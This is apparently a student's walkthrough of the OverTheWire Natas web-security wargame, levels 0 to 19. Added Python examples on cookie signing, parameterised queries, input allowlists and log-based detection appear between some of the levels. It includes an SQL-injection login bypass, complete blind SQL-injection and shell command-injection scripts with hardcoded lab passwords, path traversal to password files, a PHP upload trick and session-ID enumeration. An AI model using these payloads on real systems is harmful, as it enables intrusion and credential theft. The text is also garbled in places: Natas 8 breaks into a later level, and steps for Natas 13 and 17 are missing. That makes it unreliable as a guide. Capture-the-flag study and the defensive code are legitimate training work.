Natas - Walkthrough
SNP - IE2012
G.D.I.Bomal - IT22032188
00/00/2023
The password to access Natas0 is given on the website itself.
Natas 0:
For this level, to obtain the password all you need to do is inspect the webpage by
right-clicking anywhere on the screen, then expand the tags; the password is given as a
comment.
Natas 1:
For this level, right-clicking has been blocked, so to access the inspect menu all you need
to do is use the keyboard.
Press Ctrl + Shift + I to open the inspect menu without right-clicking and expand the tags;
the password will be given as a comment.
Natas 2:
For this level we can right-click again, but there is no commented password; instead, there is
an image with the src “files/pixel.png”.
Then we can open the users.txt file and get the password.
Natas 3:
In this level there is a comment saying “No more information leaks!! Not even Google will
find it this time…”, suggesting that the data has been hidden from Google.
This is where the “robots.txt” file comes in: robots.txt is a file used to manage crawler
traffic to the site, and also to keep some files out of Google.
To see these files we just need to add the file path “/robots.txt” to the end of the URL of the
natas3 page.
Here we can see a directory that is hidden from Google, so let's put that at the end of the URL now
(replace /robots.txt with /s3cr3t/).
Now access users.txt and get the password for the next level.
Natas 4:
To get the password for this level we need to visit the website from the natas5 link. To do this
we can use the Firefox browser or the Burp Suite software (an account needs to be created).
Now right-click the request and click “Send to Repeater”, then go to the Repeater tab, change the
Referer to the link given on the natas4 webpage and click Send, then scroll down in the
response section to get the password for natas5.
Natas 5:
For this level, it says that we are not logged in, so all we need to do is change the cookies in
the inspect menu.
Natas 6:
To access the file we can simply add “/includes/secret.inc” to the end of the natas6 URL.
We get the following page:
We can copy and paste this code into the natas6 webpage and get the password for natas7.
Natas 7:
In this level, we can see two buttons, Home and About. The buttons don't do much by
themselves, so we go to the inspect menu and see a comment saying “hint: password for
webuser natas8 is in /etc/natas_webpass/natas8”.
Now let's click either of the buttons and edit the URL.
Change the URL from
“http://natas7.natas.labs.overthewire.org/index.php?page=<home/about>” to
“http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8” and
you should get the password.
Natas 8:
In this level, the password has been encoded and the result is given.
The encodings applied are base64, strrev and bin2hex (base64 encoding, string reverse, and
binary to hex); none of them needs a key, so let's reverse them in the opposite order,
starting with bin2hex:
a /etc/natas_webpass/natas11
Since the password has the letter ‘A’ in it and the search is case insensitive, the
password appeared.
Natas 11:
In this level, we have to go through a long decryption process to get the password.
First let's start with the basic steps:
1. Go to the cookies section and find the “data” cookie, make sure it is URL decoded,
and copy it
2. We can take that and decode it using a base64 decoder
3. Now that will be our ciphertext for the XOR decryption
4. To get the plaintext, we JSON encode the default data variable from the
source code
5. Finally we XOR our ciphertext with the plaintext to get the key for the next
step
6. Now that we have the key (KNHL) we can go to the CyberChef website and start
decoding/encoding to get the new cookie
7. First we enter the plaintext into the input field, then select the XOR recipe, enter
the key under UTF8 and bake to get a new string
8. Next put the output into the input field, change the recipe to a base64 encoder
and bake; the result is the new cookie:
9. Finally, we take that output, replace the value of the data cookie on the natas11
website with it and refresh the page
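The steps above work because the cookie is XORed with a short repeating key and carries no integrity check: XORing the known plaintext with the ciphertext gives the key stream, whose period is the key. The following added example (not code from the walkthrough or from OverTheWire) reproduces that weakness on constructed data, recovers the key the way steps 3–5 describe, and then shows the usual fix: an HMAC tag over the cookie body so that a modified cookie is rejected. The field names, the key KNHL as a value and the server secret are assumptions for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Constructed stand-ins: the level's real field names and key are not needed
# for the demonstration, only the structure (JSON -> XOR -> base64).
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}
WEAK_KEY = b"KNHL"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; applying it twice restores the data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def plaintext_bytes(data: dict) -> bytes:
    """The 'plaintext' of step 4: the JSON encoding of the data dictionary."""
    return json.dumps(data).encode()


def make_weak_cookie(data: dict, key: bytes) -> str:
    """The weak scheme: base64(xor(json(data), key)) with no integrity check."""
    return base64.b64encode(xor_bytes(plaintext_bytes(data), key)).decode()


def read_weak_cookie(cookie: str, key: bytes) -> dict:
    return json.loads(xor_bytes(base64.b64decode(cookie), key))


def recover_key(cookie: str, known_plaintext: bytes, max_key_len: int = 32) -> bytes:
    """Known plaintext XOR ciphertext yields the key stream; with a repeating
    key the stream is periodic, and the shortest period is the key."""
    cipher = base64.b64decode(cookie)[:len(known_plaintext)]
    stream = xor_bytes(cipher, known_plaintext[:len(cipher)])
    for n in range(1, max_key_len + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream  # no period found within max_key_len


# Mitigation: the client may still read the cookie, but cannot alter it
# without the server-side secret, because an HMAC tag covers the body.
SERVER_SECRET = secrets.token_bytes(32)  # generated per process here


def make_signed_cookie(data: dict, secret: bytes) -> str:
    body = base64.b64encode(plaintext_bytes(data)).decode()
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag


def read_signed_cookie(cookie: str, secret: bytes):
    """Returns the data, or None when the tag does not verify (tampered or forged)."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(base64.b64decode(body))


def tampered_copy(signed_cookie: str, new_data: dict) -> str:
    """Replace the body of a signed cookie but keep the old tag, i.e. what an
    edit of the cookie in the browser looks like to the server."""
    tag = signed_cookie.rpartition(".")[2]
    return base64.b64encode(plaintext_bytes(new_data)).decode() + "." + tag


if __name__ == "__main__":
    cookie = make_weak_cookie(DEFAULT_DATA, WEAK_KEY)
    print("recovered key:", recover_key(cookie, plaintext_bytes(DEFAULT_DATA)))
    signed = make_signed_cookie(DEFAULT_DATA, SERVER_SECRET)
    edited = tampered_copy(signed, {"showpassword": "yes"})
    print("edited signed cookie accepted?", read_signed_cookie(edited, SERVER_SECRET) is not None)
```

The HMAC variant still lets the client see the settings; if the contents must also stay secret, an authenticated encryption mode (AES-GCM, for instance) replaces both the XOR and the separate tag.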
Natas 12:
For this level, we have to upload something, and from the source code we can see that we
can try to upload a .php file to get the password.
First, let's make a file with any name and the extension .php, and write this in
it:
Now we once again need Burp Suite to intercept the request and change the uploaded
extension from .jpg back to .php.
Load up Burp, go to Proxy, open its browser, log in to natas12, and select the
.php file there.
Before uploading, turn intercept on in Burp Suite and then upload the file.
Then right-click in the Burp Suite window and click “Send to Repeater”.
Then change the extension of the file name from .jpg to .php.
6. Now click Send and copy the directory given in the response section
7. Paste it after the URL with the same command you used in level 12, like so, and
you will get the password
8. Copy the password given at the end and move on to the next level
Natas 14:
For this level, we can bypass the username and password checks by entering an “always
true” statement.
Junk" OR 1=1# is an always-true statement.
The # is used so that MySQL ignores everything after it and only executes whatever is
before it.
Natas 15:
For this level, we have to do a blind SQL injection to leak the password, using a
Python program.
We need to write a Python program that loops through all the possible characters that could
be part of the password, one position at a time:
import requests
from string import ascii_lowercase, ascii_uppercase, digits

characters = ascii_lowercase + ascii_uppercase + digits

username = 'natas15'
password = 'TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB'
url = 'http://%s.natas.labs.overthewire.org/' % username
session = requests.Session()

seen_password = []   # characters of the natas16 password recovered so far
done = False
while not done:
    for ch in characters:
        # Boolean-based blind injection: the page answers "user exists" only
        # when the prefix guessed so far matches (BINARY makes LIKE case sensitive).
        payload = 'natas16" AND BINARY password LIKE "' + "".join(seen_password) + ch + '%" #'
        response = session.post(url, data={"username": payload}, auth=(username, password))
        content = response.text
        print("trying", "".join(seen_password) + ch)
        if 'user exists' in content:
            seen_password.append(ch)
            break
    if len(seen_password) == 32:
        done = True
print("password:", "".join(seen_password))
Run that code and wait; the password will be generated slowly, one character at a time.
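Both Natas 14 and Natas 15 come down to the same defect: user input is concatenated into the SQL text, so a quote character ends the string literal and the rest of the input is parsed as SQL. The added example below (my code, not the level's PHP) rebuilds the two checks over a constructed in-memory SQLite table, once with string concatenation and once with parameterised queries, so the always-true login bypass and the yes/no "user exists" oracle can be compared side by side. SQLite uses single quotes for string literals and `--` for comments, so the MySQL payload `Junk" OR 1=1#` from the text is written `Junk' OR 1=1--` here; the user rows are made up.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the level's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "Wonderland42"), ("natas16", "s3cretValue")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Input is spliced into the SQL text, so a quote and a comment marker in the
    username change the structure of the query."""
    query = ("SELECT 1 FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Parameterised query: the driver binds the values as data, never as SQL."""
    query = "SELECT 1 FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def user_exists_vulnerable(conn, username: str) -> bool:
    """The Natas 15 style oracle: a yes/no answer that leaks one bit per query
    when the username field is injectable."""
    query = "SELECT 1 FROM users WHERE username='%s'" % username
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn, username: str) -> bool:
    """Same oracle with a bound parameter: a username containing SQL is simply
    a username nobody has."""
    return conn.execute("SELECT 1 FROM users WHERE username=?",
                        (username,)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    bypass = "Junk' OR 1=1--"
    print("vulnerable login with always-true username:", login_vulnerable(conn, bypass, "x"))
    print("parameterised login with the same input:   ", login_safe(conn, bypass, "x"))
    probe = "natas16' AND password LIKE 's%"
    print("vulnerable oracle, prefix 's':   ", user_exists_vulnerable(conn, probe))
    print("parameterised oracle, same input:", user_exists_safe(conn, probe))
```

Note that SQLite's LIKE is case-insensitive for ASCII, which is why the walkthrough's MySQL query adds BINARY; the parameterised version does not care, because the prefix condition never reaches the parser at all.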
Natas 16:
For this level, the $key variable checks each character of the input against a blacklist,
and the command runs only if none of the characters is in the blacklist.
grep uses regular expressions, so we can use special characters such as ^ (caret), which
anchors the match to the start of the string.
Imagine ^a: if the letter a is the very first character of the text, we won't see any results.
So to know whether a guess is right, we check that nothing shows up, and we build a list
of the letters that make the output disappear.
Again we need to use a Python script to leak the password for natas17.
This time we have changed the code a bit, to this:
import requests
import re
from string import ascii_lowercase, ascii_uppercase, digits

characters = ascii_lowercase + ascii_uppercase + digits

username = 'natas16'
password = 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V'
url = 'http://%s.natas.labs.overthewire.org/' % username
session = requests.Session()

seen_password = []   # characters of the natas17 password recovered so far
done = False
while not done:
    for ch in characters:
        # Command substitution inside the needle: when the inner grep matches the
        # guessed prefix, its output is appended to the needle and the outer
        # search finds nothing, so an empty <pre> block means the guess is right.
        needle = "anythings$(grep ^" + "".join(seen_password) + ch + " /etc/natas_webpass/natas17)"
        response = session.post(url, data={"needle": needle}, auth=(username, password))
        content = response.text
        itreturned = re.findall(r'<pre>\n(.*)\n</pre>', content)
        if not itreturned:
            seen_password.append(ch)
            print("trying", "".join(seen_password))
            break
    if len(seen_password) == 32:
        done = True
print("password:", "".join(seen_password))
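The root cause in Natas 16 is that the needle is spliced into a shell command line and only checked against a blacklist, so `$(...)` is never caught. As an added example (not the level's code), the block below puts the three pieces side by side on constructed input: a blacklist check of the kind the text describes (the exact character set is an assumption), an allowlist check that only admits dictionary-word characters, and the command built either as a shell string, as a shlex-quoted shell string, or as an argv list with no shell at all. The `search_dictionary` function is the shape a hardened version of the page would take.

```python
import re
import shlex
import shutil
import subprocess
import tempfile

# Blacklist in the spirit of the level's $key check; the exact character set
# is an assumption for this demonstration.
BLACKLIST = set(";|&`'\"")


def blacklist_allows(needle: str) -> bool:
    """Rejects only listed characters, so "$(" (and newlines) pass straight through."""
    return not any(c in BLACKLIST for c in needle)


ALLOWED_NEEDLE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def allowlist_allows(needle: str) -> bool:
    """Accept only what a dictionary word search needs; everything else is refused."""
    return ALLOWED_NEEDLE.fullmatch(needle) is not None


def shell_string_command(needle: str, path: str) -> str:
    """The risky pattern: the needle is spliced into a shell command line, so the
    shell expands $(...) inside it before grep ever runs."""
    return "grep -i " + needle + " " + path


def quoted_shell_command(needle: str, path: str) -> str:
    """Partial fix when a shell is unavoidable: shlex.quote turns the needle into a
    single-quoted literal, so the shell does not expand $(...)."""
    return "grep -i " + shlex.quote(needle) + " " + shlex.quote(path)


def argv_command(needle: str, path: str) -> list:
    """Preferred fix: no shell at all. The argv list hands the needle to grep as one
    literal argument; '--' stops grep from reading a needle such as '-r' as an option."""
    return ["grep", "-i", "--", needle, path]


def search_dictionary(needle: str, path: str) -> list:
    """Validate with the allowlist, then run grep without a shell; returns matching lines."""
    if not allowlist_allows(needle):
        raise ValueError("needle contains characters outside the allowlist")
    result = subprocess.run(argv_command(needle, path), capture_output=True,
                            text=True, timeout=5)
    return result.stdout.splitlines()


if __name__ == "__main__":
    injected = "anythings$(grep ^a /etc/natas_webpass/natas17)"
    print("blacklist lets the injection through:", blacklist_allows(injected))
    print("allowlist refuses it:", not allowlist_allows(injected))
    print("what the shell would see:", shell_string_command(injected, "dictionary.txt"))
    print("quoted form:", quoted_shell_command(injected, "dictionary.txt"))
    if shutil.which("grep"):
        with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
            f.write("apple\nbanana\navocado\n")  # constructed dictionary
        print("search for 'an':", search_dictionary("an", f.name))
```

The allowlist is the check that actually closes the hole; quoting and argv lists limit what a bad needle can do, but validating the input against what the feature needs is what keeps the next bypass out.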
To overcome this issue we will use the sleep function: whenever a character is in the
password the query will sleep for a second, so we can measure the time difference, and if
the time difference is greater than expected, the character exists in the
password.
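From the defender's side the sleep-based technique described above leaves two traces in the web server logs: a time-delay function in the request parameters, and a client whose requests to one path keep taking about the injected delay. The added example below (my code, not from the walkthrough) parses a few constructed nginx-style access-log lines with `$request_time` appended as the last field, URL-decodes the request target, and raises an alert on either signal. The IP addresses, timestamps and timings are made up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines: combined format with $request_time (seconds)
# appended as the last field. Addresses and timings are invented.
LOG_LINES = [
    '203.0.113.9 - - [12/Mar/2023:10:00:00 +0000] "GET /index.php?username=alice HTTP/1.1" 200 1320 0.012',
    '203.0.113.9 - - [12/Mar/2023:10:00:01 +0000] "GET /style.css HTTP/1.1" 200 811 0.002',
    '198.51.100.7 - - [12/Mar/2023:10:00:05 +0000] "GET /index.php?username=natas16%22+AND+sleep(1)%23 HTTP/1.1" 200 1320 1.031',
    '198.51.100.7 - - [12/Mar/2023:10:00:07 +0000] "GET /index.php?username=natas16%22+AND+IF(1=1,sleep(1),0)%23 HTTP/1.1" 200 1320 1.027',
    '198.51.100.7 - - [12/Mar/2023:10:00:09 +0000] "GET /index.php?username=natas16%22+AND+IF(1=2,sleep(1),0)%23 HTTP/1.1" 200 1320 0.015',
    '198.51.100.7 - - [12/Mar/2023:10:00:11 +0000] "GET /index.php?username=natas16%22+AND+IF(1=1,sleep(1),0)%23 HTTP/1.1" 200 1320 1.040',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>\d+\.\d+)$')

# Delay functions of the common SQL dialects, matched after URL decoding.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I)


def parse_line(line: str):
    """Returns a dict for a well-formed line (with rt as float and the decoded
    target), or None for anything the regex does not recognise."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["rt"] = float(entry["rt"])
    entry["decoded"] = unquote_plus(entry["target"])
    return entry


def detect_time_based(lines, slow_seconds: float = 0.9, min_slow: int = 2):
    """Signal 1: a delay function in the decoded request target.
    Signal 2: one client with min_slow or more responses on the same path that
    took at least slow_seconds, which the injected sleep produces on every 'true' guess."""
    alerts = []
    slow_count = defaultdict(int)
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        if TIME_FUNCS.search(e["decoded"]):
            alerts.append(("payload", e["ip"], e["decoded"]))
        path = e["decoded"].split("?", 1)[0]
        if e["rt"] >= slow_seconds:
            slow_count[(e["ip"], path)] += 1
    for (ip, path), n in slow_count.items():
        if n >= min_slow:
            alerts.append(("latency", ip, "%d slow responses on %s" % (n, path)))
    return alerts


if __name__ == "__main__":
    for alert in detect_time_based(LOG_LINES):
        print(alert)
```

The latency signal is the one that survives obfuscation of the payload, because the delay is the whole point of the technique; tune `slow_seconds` to the application's normal response time rather than to the one-second figure used here.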
import requests
print("")
We also see that there is a maxid variable set to 640, so there are only 640 IDs to go through.
Now that we know this, we can start up Burp Suite and do the following steps:
1. First open up the browser from Burp and log in to natas18
2. Now turn on intercept and log in without credentials; we should see a line that
shows PHPSESSID and a value. If that is there, we continue
10. Now we can just click Start attack and wait until we see an entry where we logged in
as an admin; click it, go to the Response tab, scroll down and you should find the
password
Natas 19:
In this level, it's the same code as last time, but this time the session IDs are no longer
sequential.
So let's try the same thing again, but this time we get a different PHPSESSID; I'm assuming
they have encrypted it.
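Natas 18 works because the session ID space is a counter of at most 640 values, and Natas 19 only changes how the ID is written, not how many there are. The added example below (my code, not the levels' PHP) models both a sequential store and a store that draws IDs from the operating system's CSPRNG, and adds a small detector that flags a client presenting many distinct session IDs in a short window, which is what walking the ID space looks like from the server. The maxid of 640 is from the text; the usernames, client address and thresholds are constructed.

```python
import secrets
from collections import defaultdict, deque


class SequentialSessionStore:
    """Constructed model of the weak scheme: the session ID is a counter that
    stays below maxid, so the whole space can be walked."""

    def __init__(self, maxid: int = 640):
        self.maxid = maxid
        self.next_id = 1
        self.sessions = {}

    def create(self, username: str) -> str:
        if self.next_id > self.maxid:
            raise RuntimeError("session ID space exhausted")
        sid = str(self.next_id)
        self.next_id += 1
        self.sessions[sid] = username
        return sid

    def lookup(self, sid: str):
        return self.sessions.get(sid)

    def search_space(self) -> int:
        return self.maxid


class RandomSessionStore:
    """IDs from the OS CSPRNG; 16 bytes gives 2**128 possibilities."""

    def __init__(self, id_bytes: int = 16):
        self.id_bytes = id_bytes
        self.sessions = {}

    def create(self, username: str) -> str:
        sid = secrets.token_urlsafe(self.id_bytes)
        self.sessions[sid] = username
        return sid

    def lookup(self, sid: str):
        return self.sessions.get(sid)

    def search_space(self) -> int:
        return 2 ** (self.id_bytes * 8)


class EnumerationDetector:
    """A legitimate client presents one or two session IDs; one that presents
    threshold or more distinct IDs inside the window is walking the space."""

    def __init__(self, window: float = 60.0, threshold: int = 10):
        self.window = window
        self.threshold = threshold
        self.seen = defaultdict(deque)  # client -> deque of (time, sid)

    def record(self, client: str, sid: str, now: float) -> bool:
        q = self.seen[client]
        q.append((now, sid))
        while q and now - q[0][0] > self.window:
            q.popleft()
        return len({s for _, s in q}) >= self.threshold


def replay_guesses(store, detector, guesses, client: str, target_user: str):
    """Defender-side simulation: feed a stream of ID guesses from one client
    through the store and the detector, one guess per second. Returns the ID
    that mapped to target_user (or None), whether the detector fired, and how
    many guesses were consumed."""
    alerted = False
    for i, sid in enumerate(guesses, start=1):
        if detector.record(client, sid, now=float(i)):
            alerted = True
        if store.lookup(sid) == target_user:
            return sid, alerted, i
    return None, alerted, len(guesses)


if __name__ == "__main__":
    for store in (SequentialSessionStore(), RandomSessionStore()):
        for i in range(30):
            store.create("admin" if i == 24 else "user%d" % i)  # constructed users
        guesses = [str(n) for n in range(1, 641)]
        print(type(store).__name__, "space:", store.search_space(),
              "result:", replay_guesses(store, EnumerationDetector(), guesses, "198.51.100.7", "admin"))
```

With the random store the 640 guesses cover nothing of the 2**128 space, and the detector still fires on the tenth distinct ID, which is the response a server wants regardless of how the IDs are generated.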